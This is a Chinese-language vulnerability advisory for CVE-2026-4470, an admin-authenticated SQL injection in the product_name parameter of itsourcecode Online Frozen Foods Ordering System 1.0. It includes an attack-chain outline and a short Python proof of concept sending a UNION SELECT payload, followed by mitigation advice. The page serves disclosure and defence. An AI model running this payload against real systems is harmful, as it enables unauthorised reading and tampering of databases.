CVE-2026-4470 CVSS 4.7 中危

CVE-2026-4470: Online Frozen Foods Ordering System SQL注入漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4470

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Frozen Foods Ordering System

漏洞概述

itsourcecode Online Frozen Foods Ordering System 1.0版本被披露存在一处安全漏洞。该漏洞影响/admin/admin_edit_menu.php文件中的部分功能，成因是对product_name参数缺乏有效过滤。攻击者在拥有管理员高权限的情况下，可通过操纵该参数远程发起SQL注入攻击。此漏洞可能导致数据库信息泄露、数据篡改或服务中断。鉴于利用代码已公开，风险不容忽视，受影响用户应立即采取防护措施。

技术细节

该漏洞是一个典型的SQL注入漏洞，源于应用程序未对用户输入进行充分的安全处理。在itsourcecode Online Frozen Foods Ordering System 1.0中，/admin/admin_edit_menu.php文件负责处理菜单项的编辑操作。当系统处理product_name参数时，直接将其嵌入到SQL查询语句中，而未使用预处理语句或进行转义处理。攻击者必须先登录系统获取管理员会话（PR:H），随后向受影响端点发送包含恶意SQL代码的请求。例如，通过注入单引号截断原始查询并附加UNION SELECT语句，攻击者可以读取其他表的数据。由于漏洞利用无需用户交互且通过网络传播，一旦管理员权限被突破，数据库将完全暴露在攻击者面前，造成严重的信息安全后果。

攻击链分析

STEP 1

信息收集

攻击者识别目标正在使用itsourcecode Online Frozen Foods Ordering System 1.0版本。

STEP 2

获取凭证

由于漏洞需要高权限（PR:H），攻击者通过暴力破解或社会工程学获取管理员账户的用户名和密码。

STEP 3

发送攻击载荷

攻击者使用管理员身份登录系统，访问/admin/admin_edit_menu.php接口，并在product_name参数中插入恶意SQL注入代码。

STEP 4

执行恶意操作

后端数据库解析并执行恶意SQL语句，导致敏感数据泄露、数据被篡改或删除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
url = "http://target.com/admin/admin_edit_menu.php"

# Attacker needs to be authenticated (Admin cookie required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Payload to test SQL injection
# ' OR '1'='1 is a basic test, but for data extraction we might use UNION based injection
payload = {
    "product_name": "' UNION SELECT NULL, version(), database(), user()-- -",
    "id": "1" # Assuming an ID is needed for editing
}

response = requests.post(url, data=payload, cookies=cookies)

if response.status_code == 200:
    print("Request sent successfully. Check response for SQL errors or leaked data.")
    print(response.text)
else:
    print("Failed to send request")

影响范围

itsourcecode Online Frozen Foods Ordering System 1.0

防御指南

临时缓解措施

建议立即检查系统版本，若无法立即升级，应在/admin/admin_edit_menu.php源码中对product_name参数进行严格的输入过滤（如过滤单引号、注释符等危险字符），并使用PDO等安全的数据库操作方式重写SQL查询逻辑。同时，加强管理员账户的安全策略，防止凭证泄露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4470
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4470
3 Details https://www.cvedetails.com/cve/CVE-2026-4470/
4 VulDB https://vuldb.com/cve/CVE-2026-4470
5 Link https://github.com/sjkdhl/public/issues/3
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.351760
8 Link https://vuldb.com/?id.351760
9 Link https://vuldb.com/?submit.772882

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表